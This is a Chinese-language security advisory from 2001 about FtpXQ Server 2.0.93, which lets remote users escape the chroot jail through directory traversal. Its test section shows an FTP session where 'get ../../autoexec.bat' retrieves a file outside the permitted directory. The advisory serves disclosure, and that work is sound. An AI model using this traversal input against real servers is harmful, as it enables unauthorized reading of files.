FtpXQ 存在chroot环境可突破漏洞发布时间:2001-03-29 更新时间:2001-03-29 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 FtpXQ Server version 2.0.93详细描述 FtpXQ(http://www.datawizard.net/Support/FtpXQ/ftpxq.htm)是DataWizard 技术的WinsockQ来构建的FTP服务程序,其中存在一个漏洞可以导致远程用户突破CHROOT限制的环境。 测试代码 % ftp localhost Connected to xxxxxxxxx.rh.rit.edu. 220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93). User (xxxxxxxxx.rh.rit.edu:(none)): test 331 OK need password. Password: 230 Welcome to DataWizard Technologies' FtpXQ FTP Server. ftp> pwd 257 Remote directory is "/directory/directory/" ftp> cd .. 550 Requested file action not taken---user does not have access. ftp> get ../../autoexec.bat 200 OK 150 Opening data connection. 226 Transfer completed. ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec. ftp> 解决方案 尚无 相关信息 此信息有Joe Testa(joetesta@HUSHMAIL.COM)发布。 |
